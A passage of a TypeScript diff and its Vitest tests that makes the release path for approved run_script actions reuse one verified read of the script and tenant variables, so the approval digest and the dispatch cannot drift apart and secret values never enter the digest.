+    // fastest-moving part of a run_script release. `computeEffectDigestOutcome`
+    // (the CREATION path) projects it back off, so the plaintext-bearing scope
+    // never reaches a caller that has no use for it.
+    return {
+      kind: 'material',
+      material: runScriptDigestMaterial(built.snapshot),
+      verified: { snapshot: built.snapshot, scriptRow: built.scriptRow, scope: built.scope },
+    };
   },
 
   // manage_quotes:send: pin the quote's revision (updated_at) plus a
@@ -368,14 +383,36 @@ export async function computeEffectDigestOutcome(
   args: Record<string, unknown>,
   database: Database,
 ): Promise<EffectDigestOutcome> {
+  const resolved = await resolveEffectDigest(toolName, args, database);
+  // Project `verified` back off. The creation path has no dispatch to feed and
+  // no business holding decrypted tenant plaintext one property access away —
+  // narrowing the declared return type alone would leave the object carrying
+  // it at runtime.
+  return resolved.outcome.kind === 'pinned'
+    ? { kind: 'pinned', digest: resolved.outcome.digest }
+    : resolved.outcome;
+}
+
+/**
+ * Everything one resolver produced: the outcome the creation path stores, plus
+ * the material a RELEASE path can execute from without reading it again.
+ */
+async function resolveEffectDigest(
+  toolName: string,
+  args: Record<string, unknown>,
+  database: Database,
+): Promise<{ outcome: EffectDigestOutcome; verified?: VerifiedRunScript }> {
   const action = typeof args.action === 'string' ? args.action : undefined;
   const key = effectDigestResolverKey(toolName, action);
-  if (!key) return { kind: 'not_applicable' };
+  if (!key) return { outcome: { kind: 'not_applicable' } };
 
   const result = await EFFECT_DIGEST_RESOLVERS[key]!(args, database);
-  if (result.kind !== 'material') return { kind: 'unresolved', reason: result.kind };
+  if (result.kind !== 'material') return { outcome: { kind: 'unresolved', reason: result.kind } };
 
-  return { kind: 'pinned', digest: createHash('sha256').update(result.material).digest('hex') };
+  return {
+    outcome: { kind: 'pinned', digest: createHash('sha256').update(result.material).digest('hex') },
+    verified: result.verified,
+  };
 }
 
 /**
@@ -394,6 +431,48 @@ export async function computeEffectDigest(
 ): Promise<string | null> {
   const outcome = await computeEffectDigestOutcome(toolName, args, database);
   return outcome.kind === 'pinned' ? outcome.digest : null;
+}
+
+/** What a release path gets back: the digest to compare, and — when the
+ *  resolver produced one — the verified material to EXECUTE from. */
+export type EffectDigestReleaseResult = {
+  /** Same value `computeEffectDigest` returns, for the same comparison. */
+  digest: string | null;
+  /** Absent unless the resolver resolved something a handler can reuse. */
+  context?: ToolExecutionContext;
+};
+
+/**
+ * The RELEASE-path recompute (#3409 PR4c-1) — `computeEffectDigest`'s sibling,
+ * not its replacement.
+ *
+ * Both release paths (jobs/intentReleaseWorker.ts and the inline chat release
+ * in services/aiAgentSdk.ts) already read the target in order to recompute the
+ * digest. Before this existed they then threw that read away and let the tool
+ * handler read it AGAIN at dispatch — which reopens precisely the check/use
+ * window the digest exists to close: everything the digest just proved
+ * unchanged could change between the comparison and the handler's own query.
+ *
+ * So this returns the digest AND the resolved material, and the caller hands
+ * the latter to `executeTool` as its `ToolExecutionContext`. A caller that
+ * ignores `context` behaves exactly as `computeEffectDigest` — which is why
+ * that flattener keeps its `string | null` signature for every non-release
+ * caller rather than being widened.
+ *
+ * The context is returned even on a MISMATCH (the digest is what decides), so
+ * a caller must compare first and only then dispatch. Both call sites fail
+ * closed before reaching `executeTool`, and their tests pin that.
+ */
+export async function computeEffectDigestForRelease(
+  toolName: string,
+  args: Record<string, unknown>,
+  database: Database,
+): Promise<EffectDigestReleaseResult> {
+  const resolved = await resolveEffectDigest(toolName, args, database);
+  const digest = resolved.outcome.kind === 'pinned' ? resolved.outcome.digest : null;
+  return resolved.verified
+    ? { digest, context: { verifiedRunScript: resolved.verified } }
+    : { digest };
 }
 
 /**

--- a/apps/api/src/services/actionIntents/effectDigest.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.ts
@@ -117,8 +117,8 @@ const EFFECT_DIGEST_RESOLVERS: Record<
   // The pinned set — and the reads that produce it — live in
   // runScriptSnapshot.ts rather than inline here: #3409 PR4c-1 makes the
   // digest and dispatch derivable from ONE observation instead of two copies
-  // free to drift apart (the release side consumes the snapshot's scope; this
-  // creation-side call needs only the material).
+  // free to drift apart (the release side will consume the snapshot's scope;
+  // this creation-side call needs only the material).
   // `runScriptDigestMaterial` is a `v: 2` envelope, so a digest pinned before
   // this change can never compare equal to a recomputed one: a pre-PR4c
   // intent fails closed at release rather than revalidating against a

--- a/apps/api/src/services/actionIntents/effectDigestCoverage.contract.test.ts
+++ b/apps/api/src/services/actionIntents/effectDigestCoverage.contract.test.ts
@@ -22,9 +22,13 @@
  * No `vi.mock` — like intentReleaseWorker.durable.contract.test.ts and
  * aiGuardrails.approvalScope.contract.test.ts, this needs the REAL registries
  * on both sides (the tier-3 classification tables AND the live resolver map)
- * to be a meaningful contract. effectDigest.ts imports only Drizzle table
- * objects and takes its `Database` as a parameter, so importing it here pulls
- * in no live DB client.
+ * to be a meaningful contract. Importing effectDigest.ts is safe here because
+ * every resolver takes its `Database` as a PARAMETER — nothing in the module
+ * opens a connection at import time. (Since #3409 PR4c-1 the import graph does
+ * reach '../../db' transitively, via runScriptSnapshot -> tenantVariable-
+ * Resolution's `loadTenantVariableScope`; postgres.js constructs its client
+ * lazily and connects only on first query, so module load stays inert. This
+ * file never invokes a resolver, only `effectDigestResolverKey`.)
  */
 import { describe, it, expect } from 'vitest';
 import {

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
@@ -1,0 +1,502 @@
+import { describe, expect, it, vi } from 'vitest';
+import { canonicalizeScriptParameterDefinitions } from '@breeze/shared';
+import type { Database } from '../../db';
+import { resolveForOrg, type ResolvedVariable, type TenantVariableScope } from '../tenantVariableResolution';
+import {
+  buildRunScriptSnapshot,
+  runScriptDigestMaterial,
+  type RunScriptSnapshot,
+} from './runScriptSnapshot';
+
+/**
+ * Harness copied from `effectDigest.test.ts` — same hand-rolled chainable
+ * stub, same "each awaited chain shifts the next array off `queue`"
+ * contract, and deliberately NO `vi.mock` of the db module (this suite, like
+ * that one, proves the builder works against whatever `Database` it is
+ * handed).
+ *
+ * One addition: `then`. The script lookup here ends in `.limit(1)` like every
+ * resolver in that file, but the device -> org lookup is awaited on
+ * `.where(...)` directly — `inArray` already bounds the row count, so a
+ * `.limit()` there would be decoration added purely to satisfy a stub. Making
+ * the chain itself thenable keeps the queue semantics identical.
+ *
+ * Queue order for a full build: [script rows, device rows].
+ */
+function makeFakeDb(queue: unknown[][]): {
+  database: Database;
+  select: ReturnType<typeof vi.fn>;
+  wheres: unknown[];
+} {
+  const wheres: unknown[] = [];
+  const take = async () => queue.shift() ?? [];
+  const chain = {
+    limit: vi.fn(take),
+    orderBy: vi.fn(take),
+    then: (resolve: (rows: unknown[]) => unknown, reject: (err: unknown) => unknown) =>
+      take().then(resolve, reject),
+  };
+  const select = vi.fn(() => ({
+    from: vi.fn(() => ({
+      where: vi.fn((condition: unknown) => {
+        wheres.push(condition);
+        return chain;
+      }),
+    })),
+  }));
+  return { database: { select } as unknown as Database, select, wheres };
+}
+
+/** A `scripts` row as the snapshot builder selects it. */
+const scriptRow = (overrides: Record<string, unknown> = {}) => ({
+  id: 'script-1',
+  orgId: 'org-1',
+  language: 'bash',
+  content: '#!/bin/bash\necho hi',
+  timeoutSeconds: 300,
+  runAs: 'user',
+  parameters: null,
+  ...overrides,
+});
+
+const deviceRow = (id: string, orgId: string) => ({ id, orgId });
+
+const variable = (overrides: Partial<ResolvedVariable> & { key: string }): ResolvedVariable => ({
+  value: 'ordinary-value',
+  isSecret: false,
+  variableId: 'var-1',
+  version: 1,
+  ownerScope: 'organization',
+  ...overrides,
+});
+
+/**
+ * A `TenantVariableScope` carrier built by hand.
+ *
+ * `loadTenantVariableScope` is the only sanctioned constructor and it reads
+ * the module-level `db`, which this suite cannot reach without mocking the db
+ * module. So the builder takes a `loadScope` seam (same rationale as
+ * `effectDigest.ts`'s injected `database`) and these tests hand back a carrier
+ * carrying the three fields `InternalTenantVariableScope` documents.
+ *
+ * Only the DATA is faked: the production `resolveForOrg` / `unreadableForOrg`
+ * accessors still run over this object, so their membership check and copy-out
+ * semantics are exercised for real. If that internal shape were ever renamed,
+ * those accessors would return empty and these tests go red — never silently
+ * green.
+ */
+interface FakeOrgScope {
+  orgId: string;
+  present?: ResolvedVariable[];
+  unreadable?: string[];
+}
+function fakeScope(orgs: FakeOrgScope[]): TenantVariableScope {
+  return {
+    orgIds: new Set(orgs.map((o) => o.orgId)),
+    byOrg: new Map(orgs.map((o) => [o.orgId, new Map((o.present ?? []).map((v) => [v.key, v]))])),
+    unreadableKeysByOrg: new Map(orgs.map((o) => [o.orgId, new Set(o.unreadable ?? [])])),
+  } as unknown as TenantVariableScope;
+}
+
+interface BuildOptions {
+  args?: Record<string, unknown>;
+  /** `null` = the script lookup returns no row. */
+  script?: Record<string, unknown> | null;
+  devices?: Array<{ id: string; orgId: string }>;
+  scope?: TenantVariableScope;
+}
+
+function build(options: BuildOptions = {}) {
+  const script = options.script === undefined ? scriptRow() : options.script;
+  const devices = options.devices ?? [deviceRow('device-1', 'org-1')];
+  const args = options.args ?? {
+    scriptId: 'script-1',
+    deviceIds: devices.map((d) => d.id),
+  };
+  const scope =
+    options.scope ?? fakeScope([...new Set(devices.map((d) => d.orgId))].map((orgId) => ({ orgId })));
+  const loadScope = vi.fn(async () => scope);
+  const fake = makeFakeDb([script === null ? [] : [script], devices]);
+  return {
+    ...fake,
+    loadScope,
+    result: buildRunScriptSnapshot(args, fake.database, { loadScope }),
+  };
+}
+
+async function snapshotOf(options: BuildOptions = {}): Promise<RunScriptSnapshot> {
+  const outcome = await build(options).result;
+  if (outcome.kind !== 'snapshot') throw new Error(`expected a snapshot, got ${outcome.kind}`);
+  return outcome.snapshot;
+}
+
+const materialOf = async (options: BuildOptions = {}) => runScriptDigestMaterial(await snapshotOf(options));
+
+/** Every column name mentioned anywhere in a Drizzle condition tree. */
+function columnNames(node: unknown, out: string[] = []): string[] {
+  if (Array.isArray(node)) {
+    for (const entry of node) columnNames(entry, out);
+    return out;
+  }
+  if (!node || typeof node !== 'object') return out;
+  const record = node as Record<string, unknown>;
+  if (typeof record.name === 'string' && typeof record.table === 'object') out.push(record.name);
+  if (Array.isArray(record.queryChunks)) columnNames(record.queryChunks, out);
+  return out;
+}
+
+describe('runScriptDigestMaterial', () => {
+  // THE test. `effect_digest` is a widely-readable column; its INPUT must
+  // never be reconstructible into a tenant variable's plaintext. A reference
+  // pins identity (variableId + version + isSecret), never value.
+  it('never puts a resolved variable VALUE in the material', async () => {
+    const plaintext = 'sup3r-secret-plaintext-do-not-pin';
+    const snapshot = await snapshotOf({
+      script: scriptRow({ content: 'echo {{var.api_token}}' }),
+      scope: fakeScope([
+        {
+          orgId: 'org-1',
+          present: [variable({ key: 'api_token', value: plaintext, variableId: 'var-9', version: 7, isSecret: true })],
+        },
+      ]),
+    });
+
+    const material = runScriptDigestMaterial(snapshot);
+    expect(material).not.toContain(plaintext);
+    // The scope the snapshot carries DOES hold that plaintext — so the
+    // assertion above is about what the material selects, not about a value
+    // that was never in reach.
+    expect(resolveForOrg(snapshot.variableScope, 'org-1').get('api_token')?.value).toBe(plaintext);
+    // ...and the reference itself carries identity only.
+    expect(snapshot.variableReferences).toEqual([
+      {
+        orgId: 'org-1',
+        key: 'api_token',
+        state: 'present',
+        variableId: 'var-9',
+        version: 7,
+        isSecret: true,
+        ownerScope: 'organization',
+      },
+    ]);
+    expect(material).toContain('var-9');
+  });
+
+  it('pins the five script fields, the canonical parameter definitions and the sorted references', async () => {
+    const definitions = [
+      { name: 'token', type: 'string', source: 'tenantVariable', variableKey: 'api_token' },
+    ];
+    const snapshot = await snapshotOf({
+      script: scriptRow({ content: 'echo {{var.region}}', parameters: definitions }),
+      scope: fakeScope([
+        {
+          orgId: 'org-1',
+          present: [
+            variable({ key: 'api_token', variableId: 'var-a', version: 3, isSecret: true }),
+            variable({ key: 'region', variableId: 'var-b', version: 1, ownerScope: 'partner' }),
+          ],
+        },
+      ]),
+    });
+
+    expect(JSON.parse(runScriptDigestMaterial(snapshot))).toEqual({
+      v: 2,
+      script: {
+        orgId: 'org-1',
+        language: 'bash',
+        content: 'echo {{var.region}}',
+        timeoutSeconds: 300,
+        runAs: 'user',
+      },
+      parameterDefinitions: canonicalizeScriptParameterDefinitions(definitions),
+      deviceOrgIds: ['org-1'],
+      variableReferences: [
+        {
+          orgId: 'org-1',
+          key: 'api_token',
+          state: 'present',
+          variableId: 'var-a',
+          version: 3,
+          isSecret: true,
+          ownerScope: 'organization',
+        },
+        {
+          orgId: 'org-1',
+          key: 'region',
+          state: 'present',
+          variableId: 'var-b',
+          version: 1,
+          isSecret: false,
+          ownerScope: 'partner',
+        },
+      ],
+    });
+  });
+
+  it('is a v:2 envelope that can never collide with the v1 five-field material', async () => {
+    const snapshot = await snapshotOf();
+    const v1 = JSON.stringify({
+      orgId: 'org-1',
+      language: 'bash',
+      content: '#!/bin/bash\necho hi',
+      timeoutSeconds: 300,
+      runAs: 'user',
+    });
+    expect(runScriptDigestMaterial(snapshot)).not.toBe(v1);
+    expect(JSON.parse(runScriptDigestMaterial(snapshot)).v).toBe(2);
+  });
+});
+
+describe('runScriptDigestMaterial determinism', () => {
+  it('ignores device id order', async () => {
+    const a = await materialOf({
+      devices: [deviceRow('device-1', 'org-b'), deviceRow('device-2', 'org-a')],
+    });
+    const b = await materialOf({
+      devices: [deviceRow('device-2', 'org-a'), deviceRow('device-1', 'org-b')],
+    });
+    expect(a).toBe(b);
+  });
+
+  it('ignores the order variables were inserted into the scope', async () => {
+    const content = 'echo {{var.alpha}} {{var.beta}}';
+    const alpha = variable({ key: 'alpha', variableId: 'var-alpha' });
+    const beta = variable({ key: 'beta', variableId: 'var-beta' });
+    const a = await materialOf({
+      script: scriptRow({ content }),
+      scope: fakeScope([{ orgId: 'org-1', present: [alpha, beta] }]),
+    });
+    const b = await materialOf({
+      script: scriptRow({ content }),
+      scope: fakeScope([{ orgId: 'org-1', present: [beta, alpha] }]),
+    });
+    expect(a).toBe(b);
+  });
+
+  it('ignores parameter-definition object key order', async () => {
+    const a = await materialOf({
+      script: scriptRow({ parameters: [{ name: 'level', type: 'string', source: 'runtime', required: true }] }),
+    });
+    const b = await materialOf({
+      script: scriptRow({ parameters: [{ required: true, source: 'runtime', type: 'string', name: 'level' }] }),
+    });
+    expect(a).toBe(b);
+  });
+
+  // Sorting is by UTF-16 code point, never `localeCompare` — the digest must
+  // be byte-reproducible regardless of the runtime's ICU data and locale.
+  it('sorts keys and org ids by code point, not by locale', async () => {
+    // Guard: this pair really does discriminate the two comparators.
+    expect('a_b'.localeCompare('a1b')).toBeLessThan(0);
+    expect('a_b' > 'a1b').toBe(true);
+    expect('org_2'.localeCompare('org1')).toBeLessThan(0);
+    expect('org_2' > 'org1').toBe(true);
+
+    const snapshot = await snapshotOf({
+      script: scriptRow({ content: 'echo {{var.a_b}} {{var.a1b}}' }),
+      devices: [deviceRow('device-1', 'org_2'), deviceRow('device-2', 'org1')],
+      scope: fakeScope([{ orgId: 'org_2' }, { orgId: 'org1' }]),
+    });
+
+    expect(snapshot.deviceOrgIds).toEqual(['org1', 'org_2']);
+    expect(snapshot.variableReferences.map((r) => `${r.orgId}/${r.key}`)).toEqual([
+      'org1/a1b',
+      'org1/a_b',
+      'org_2/a1b',
+      'org_2/a_b',
+    ]);
+  });
+});
+
+describe('runScriptDigestMaterial drift sensitivity', () => {
+  const content = 'echo {{var.api_token}}';
+  const definitions = [
+    { name: 'token', type: 'string', source: 'tenantVariable', variableKey: 'api_token' },
+  ];
+  const baseline = (overrides: Partial<ResolvedVariable> = {}) => ({
+    script: scriptRow({ content, parameters: definitions }),
+    scope: fakeScope([
+      { orgId: 'org-1', present: [variable({ key: 'api_token', variableId: 'var-a', version: 3, ...overrides })] },
+    ]),
+  });
+
+  it.each<[string, BuildOptions]>([
+    ['the variable version is bumped', baseline({ version: 4 })],
+    ['isSecret flips false -> true', baseline({ isSecret: true })],
+    [
+      'the variable id changes (an org override shadows a partner-wide row of the same key and value)',
+      {
+        script: scriptRow({ content, parameters: definitions }),
+        scope: fakeScope([
+          {
+            orgId: 'org-1',
+            present: [
+              variable({ key: 'api_token', variableId: 'var-override', version: 3, ownerScope: 'organization' }),
+            ],
+          },
+        ]),
+      },
+    ],
+    [
+      'a reference goes present -> absent',
+      { script: scriptRow({ content, parameters: definitions }), scope: fakeScope([{ orgId: 'org-1' }]) },
+    ],
+    [
+      'a reference goes present -> unreadable',
+      {
+        script: scriptRow({ content, parameters: definitions }),
+        scope: fakeScope([{ orgId: 'org-1', unreadable: ['api_token'] }]),
+      },
+    ],
+    [
+      "a parameter definition's variableKey is rebound",
+      {
+        script: scriptRow({
+          content,
+          parameters: [{ name: 'token', type: 'string', source: 'tenantVariable', variableKey: 'other_token' }],
+        }),
+        scope: fakeScope([
+          { orgId: 'org-1', present: [variable({ key: 'api_token', variableId: 'var-a', version: 3 })] },
+        ]),
+      },
+    ],
+    [
+      'a parameter definition is added',
+      {
+        script: scriptRow({
+          content,
+          parameters: [...definitions, { name: 'level', type: 'string', source: 'runtime' }],
+        }),
+        scope: fakeScope([
+          { orgId: 'org-1', present: [variable({ key: 'api_token', variableId: 'var-a', version: 3 })] },
+        ]),
+      },
+    ],
+    [
+      'a parameter definition is removed',
+      {
+        script: scriptRow({ content, parameters: [] }),
+        scope: fakeScope([
+          { orgId: 'org-1', present: [variable({ key: 'api_token', variableId: 'var-a', version: 3 })] },
+        ]),
+      },
+    ],
+  ])('changes the material when %s', async (_case, drifted) => {
+    expect(await materialOf(baseline())).not.toBe(await materialOf(drifted));
+  });
+
+  // The opposite direction is not symmetric-by-construction: a boolean can be
+  // dropped from the material entirely when false and the true -> false case
+  // would still look like a change while false -> true silently didn't.
+  it('changes the material when isSecret flips true -> false', async () => {
+    const secret = await materialOf(baseline({ isSecret: true }));
+    const notSecret = await materialOf(baseline({ isSecret: false }));
+    expect(secret).not.toBe(notSecret);
+  });
+});
+
+describe('buildRunScriptSnapshot variable references', () => {
+  it('references the union of content tokens and parameter variableKeys', async () => {
+    const snapshot = await snapshotOf({
+      script: scriptRow({
+        content: 'echo {{var.from_content}}',
+        parameters: [{ name: 'p', type: 'string', source: 'tenantVariable', variableKey: 'from_param' }],
+      }),
+      scope: fakeScope([{ orgId: 'org-1' }]),
+    });
+    expect(snapshot.variableReferences.map((r) => r.key)).toEqual(['from_content', 'from_param']);
+  });
+
+  it('produces no references and loads no variable scope for a script with neither', async () => {
+    const built = build({ script: scriptRow({ content: 'echo hi', parameters: [] }) });
+    const outcome = await built.result;
+    expect(outcome.kind).toBe('snapshot');
+    expect(outcome.kind === 'snapshot' && outcome.snapshot.variableReferences).toEqual([]);
+    expect(built.loadScope).toHaveBeenCalledWith([]);
+  });
+
+  it('emits one reference per (org, key) — the same key resolving differently in two orgs', async () => {
+    const snapshot = await snapshotOf({
+      script: scriptRow({ content: 'echo {{var.api_token}}' }),
+      devices: [deviceRow('device-1', 'org-a'), deviceRow('device-2', 'org-b')],
+      scope: fakeScope([
+        { orgId: 'org-a', present: [variable({ key: 'api_token', variableId: 'var-a', version: 1 })] },
+        {
+          orgId: 'org-b',
+          present: [variable({ key: 'api_token', variableId: 'var-b', version: 5, ownerScope: 'partner' })],
+        },
+      ]),
+    });
+
+    expect(snapshot.variableReferences).toEqual([
+      { orgId: 'org-a', key: 'api_token', state: 'present', variableId: 'var-a', version: 1, isSecret: false, ownerScope: 'organization' },
+      { orgId: 'org-b', key: 'api_token', state: 'present', variableId: 'var-b', version: 5, isSecret: false, ownerScope: 'partner' },
+    ]);
+  });
+
+  it('marks an absent key absent and an undecryptable key unreadable, per org', async () => {
+    const snapshot = await snapshotOf({
+      script: scriptRow({ content: 'echo {{var.api_token}}' }),
+      devices: [deviceRow('device-1', 'org-a'), deviceRow('device-2', 'org-b')],
+      scope: fakeScope([{ orgId: 'org-a' }, { orgId: 'org-b', unreadable: ['api_token'] }]),
+    });
+    expect(snapshot.variableReferences).toEqual([
+      { orgId: 'org-a', key: 'api_token', state: 'absent' },
+      { orgId: 'org-b', key: 'api_token', state: 'unreadable' },
+    ]);
+  });
+});
+
+describe('buildRunScriptSnapshot resolution outcomes', () => {
+  it('returns missing_arg when scriptId is absent or not a string', async () => {
+    const absent = build({ args: { deviceIds: ['device-1'] } });
+    expect((await absent.result).kind).toBe('missing_arg');
+    expect(absent.select).not.toHaveBeenCalled();
+
+    const wrongType = build({ args: { scriptId: 42, deviceIds: ['device-1'] } });
+    expect((await wrongType.result).kind).toBe('missing_arg');
+    expect(wrongType.select).not.toHaveBeenCalled();
+  });
+
+  // JUDGEMENT CALL (brief Step 1): `deviceIds` is `required` in run_script's
+  // tool schema (aiToolsScripts.ts), so a call without it is a malformed
+  // argument, not a resolvable target — same class as a missing scriptId.
+  it.each([
+    ['absent', {}],
+    ['an empty array', { deviceIds: [] }],
+    ['not an array', { deviceIds: 'device-1' }],
+    ['an array with a non-string element', { deviceIds: ['device-1', 7] }],
+  ])('returns missing_arg when deviceIds is %s', async (_case, deviceArgs) => {
+    const built = build({ args: { scriptId: 'script-1', ...deviceArgs } });
+    expect((await built.result).kind).toBe('missing_arg');
+    expect(built.select).not.toHaveBeenCalled();
+  });
+
+  it('returns target_absent for a script that does not exist, filtering soft-deleted rows', async () => {
+    const built = build({ script: null });
+    expect((await built.result).kind).toBe('target_absent');
+    // Non-vacuous: the lookup really does constrain on scripts.deleted_at.
+    expect(columnNames(built.wheres[0])).toEqual(expect.arrayContaining(['id', 'deleted_at']));
+  });
+
+  // Fail closed: silently dropping an unresolvable device would shrink the
+  // reference set (fewer orgs => fewer pinned references) and let the digest
+  // match while the approved fan-out no longer does.
+  it('returns target_absent when a device id does not resolve to an org', async () => {
+    const built = build({
+      args: { scriptId: 'script-1', deviceIds: ['device-1', 'ghost'] },
+      devices: [deviceRow('device-1', 'org-1')],
+    });
+    expect((await built.result).kind).toBe('target_absent');
+  });
+
+  it('deduplicates repeated device ids rather than calling them unresolvable', async () => {
+    const built = build({
+      args: { scriptId: 'script-1', deviceIds: ['device-1', 'device-1'] },
+      devices: [deviceRow('device-1', 'org-1')],
+    });
+    const outcome = await built.result;
+    expect(outcome.kind).toBe('snapshot');
+    expect(outcome.kind === 'snapshot' && outcome.snapshot.deviceOrgIds).toEqual(['org-1']);
+  });
+});

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
@@ -124,10 +124,15 @@ function build(options: BuildOptions = {}) {
   };
 }
 
-async function snapshotOf(options: BuildOptions = {}): Promise<RunScriptSnapshot> {
+/** The `{ snapshot, scope }` pair, asserted to have resolved. */
+async function builtOf(options: BuildOptions = {}): Promise<{ snapshot: RunScriptSnapshot; scope: TenantVariableScope }> {
   const outcome = await build(options).result;
   if (outcome.kind !== 'snapshot') throw new Error(`expected a snapshot, got ${outcome.kind}`);
-  return outcome.snapshot;
+  return { snapshot: outcome.snapshot, scope: outcome.scope };
+}
+
+async function snapshotOf(options: BuildOptions = {}): Promise<RunScriptSnapshot> {
+  return (await builtOf(options)).snapshot;
 }
 
 const materialOf = async (options: BuildOptions = {}) => runScriptDigestMaterial(await snapshotOf(options));
@@ -151,7 +156,7 @@ describe('runScriptDigestMaterial', () => {
   // pins identity (variableId + version + isSecret), never value.
   it('never puts a resolved variable VALUE in the material', async () => {
     const plaintext = 'sup3r-secret-plaintext-do-not-pin';
-    const snapshot = await snapshotOf({
+    const { snapshot, scope } = await builtOf({
       script: scriptRow({ content: 'echo {{var.api_token}}' }),
       scope: fakeScope([
         {
@@ -163,10 +168,13 @@ describe('runScriptDigestMaterial', () => {
 
     const material = runScriptDigestMaterial(snapshot);
     expect(material).not.toContain(plaintext);
-    // The scope the snapshot carries DOES hold that plaintext — so the
-    // assertion above is about what the material selects, not about a value
-    // that was never in reach.
-    expect(resolveForOrg(snapshot.variableScope, 'org-1').get('api_token')?.value).toBe(plaintext);
+    // The SIBLING scope DOES hold that plaintext — so the assertion above is
+    // about what the material selects, not about a value that was never in
+    // reach. The scope is deliberately not a field of the snapshot: the
+    // snapshot is pure digest material, so `JSON.stringify(snapshot)` anywhere
+    // is structurally incapable of leaking a value.
+    expect(resolveForOrg(scope, 'org-1').get('api_token')?.value).toBe(plaintext);
+    expect(JSON.stringify(snapshot)).not.toContain(plaintext);
     // ...and the reference itself carries identity only.
     expect(snapshot.variableReferences).toEqual([
       {

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.test.ts
@@ -415,12 +415,30 @@ describe('buildRunScriptSnapshot variable references', () => {
     expect(snapshot.variableReferences.map((r) => r.key)).toEqual(['from_content', 'from_param']);
   });
 
+  // Task 3b (#3409 PR4c-1): the non-empty (`needsScope: true`) path is the
+  // one that matters in production — this is the call that would otherwise
+  // acquire a second pooled connection. Assert the SAME `database` the
+  // builder was handed is the one forwarded to `loadScope`, not merely that
+  // some database-shaped value was.
+  it('forwards its own database argument to loadScope on the needs-scope path', async () => {
+    const built = build({
+      script: scriptRow({ content: 'echo {{var.k}}' }),
+      scope: fakeScope([{ orgId: 'org-1', present: [variable({ key: 'k' })] }]),
+    });
+    await built.result;
+    expect(built.loadScope).toHaveBeenCalledWith(['org-1'], built.database);
+  });
+
   it('produces no references and loads no variable scope for a script with neither', async () => {
     const built = build({ script: scriptRow({ content: 'echo hi', parameters: [] }) });
     const outcome = await built.result;
     expect(outcome.kind).toBe('snapshot');
     expect(outcome.kind === 'snapshot' && outcome.snapshot.variableReferences).toEqual([]);
-    expect(built.loadScope).toHaveBeenCalledWith([]);
+    // Task 3b (#3409 PR4c-1): `loadScope` now also receives the caller's
+    // `database` (so it can reuse the already-held connection instead of
+    // escaping to a second one) — asserted here rather than just "was
+    // called", so a regression that drops the second argument goes red.
+    expect(built.loadScope).toHaveBeenCalledWith([], built.database);
   });
 
   it('emits one reference per (org, key) — the same key resolving differently in two orgs', async () => {

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -105,6 +105,18 @@ export type BuildRunScriptSnapshotResult =
       snapshot: RunScriptSnapshot;
       /** The SAME scope dispatch will resolve against. Plaintext-bearing: never digested, never serialized. */
       scope: TenantVariableScope;
+      /**
+       * The WHOLE `scripts` row this observation read, a third sibling for the
+       * same reason the scope is a second one: dispatch needs columns the
+       * digest deliberately does not pin (`osTypes`, `partnerId`, and the raw
+       * `parameters` jsonb rather than its canonical serialization), and the
+       * only way to hand it those without a second read is to carry the row
+       * itself. It is NOT folded into `snapshot.script` — that stays the exact
+       * narrow set `runScriptDigestMaterial` hashes, so "everything on the
+       * snapshot is digest material" remains true by construction rather than
+       * by remembering which fields the material projects.
+       */
+      scriptRow: typeof scripts.$inferSelect;
     }
   | { kind: 'missing_arg' }
   | { kind: 'target_absent' };
@@ -205,16 +217,15 @@ export async function buildRunScriptSnapshot(
   const deviceIds = readDeviceIds(args.deviceIds);
   if (!deviceIds) return { kind: 'missing_arg' };
 
+  // WHOLE ROW, not a projection (#3409 PR4c-1 Task 6). The digest needs seven
+  // columns; DISPATCH needs several more (`osTypes`, `partnerId`, the raw
+  // `parameters` jsonb). Selecting the row once and returning it as
+  // `scriptRow` is what lets the release path hand the handler everything it
+  // needs from ONE observation — a projection here would have forced the
+  // handler to re-read for the rest, which is exactly the check/use window
+  // this task closes.
   const [script] = await database
-    .select({
-      id: scripts.id,
-      orgId: scripts.orgId,
-      language: scripts.language,
-      content: scripts.content,
-      timeoutSeconds: scripts.timeoutSeconds,
-      runAs: scripts.runAs,
-      parameters: scripts.parameters,
-    })
+    .select()
     .from(scripts)
     // Same filter as the tool handler and the pre-PR4c resolver: a script
     // soft-deleted after approval is `target_absent`, so the release fails
@@ -296,6 +307,7 @@ export async function buildRunScriptSnapshot(
       variableReferences,
     },
     scope: variableScope,
+    scriptRow: script,
   };
 }
 

--- a/apps/api/src/services/actionIntents/runScriptSnapshot.ts
+++ b/apps/api/src/services/actionIntents/runScriptSnapshot.ts
@@ -111,15 +111,27 @@ export type BuildRunScriptSnapshotResult =
 
 /**
  * Test seam, mirroring why `effectDigest.ts` takes `database` rather than
- * importing it: `loadTenantVariableScope` reads the module-level `db`
- * singleton, so injecting it is what lets the unit suite build snapshots
- * without a live or mocked database module. Production callers pass nothing.
+ * importing it: production `loadScope` (below) forwards `buildRunScriptSnapshot`'s
+ * own `database` argument straight into `loadTenantVariableScope`'s
+ * `opts.database` (#3409 PR4c-1 Task 3b) — every call into this module
+ * already runs inside a system-scoped transaction (see the three
+ * `computeEffectDigestOutcome` call sites in effectDigest.ts's header), so
+ * reusing that connection is what avoids acquiring a second pooled one while
+ * the caller's transaction is still held. Injecting `loadScope` is what lets
+ * the unit suite build snapshots without a live or mocked database module at
+ * all. Production callers pass nothing.
  */
 export interface RunScriptSnapshotDeps {
-  loadScope: (orgIds: string[]) => Promise<TenantVariableScope>;
+  loadScope: (orgIds: string[], database: Database) => Promise<TenantVariableScope>;
 }
 
-const DEFAULT_DEPS: RunScriptSnapshotDeps = { loadScope: loadTenantVariableScope };
+const DEFAULT_DEPS: RunScriptSnapshotDeps = {
+  // Reuses the caller's already-system-scoped `database` (see the interface
+  // doc above) rather than letting `loadTenantVariableScope` escape to a
+  // second pooled connection — that escape buys nothing here, since every
+  // caller of `buildRunScriptSnapshot` is already system-scoped.
+  loadScope: (orgIds, database) => loadTenantVariableScope(orgIds, { database }),
+};
 
 /**
  * UTF-16 code point order, NEVER `localeCompare`.
@@ -230,7 +242,7 @@ export async function buildRunScriptSnapshot(
   // dispatch would have loaded — including the empty, query-free scope for the
